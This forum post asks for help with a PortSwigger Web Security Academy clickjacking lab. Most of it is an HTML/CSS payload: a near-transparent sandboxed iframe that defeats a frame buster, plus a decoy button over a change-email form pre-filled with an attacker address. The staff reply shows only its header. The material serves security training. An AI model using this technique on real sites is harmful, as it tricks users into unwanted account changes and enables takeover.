The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Unable to perform the Lab: Clickjacking with a frame buster script

Porandla | Last updated: Mar 14, 2022 04:42AM UTC

<style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.0001; z-index: 2; } div { position:absolute; top: 385px; left: 80px; z-index: 1; } </style> <div>Click me</div> <iframe sandbox="allow-forms" src="https://ace91ff41e505a05c05f019c00ce008a.web-security-academy.net/my-account/change-email?email=hacker@attacker-website.com"></iframe>

Ben, PortSwigger Agent | Last updated: Mar 14, 2022 07:45AM UTC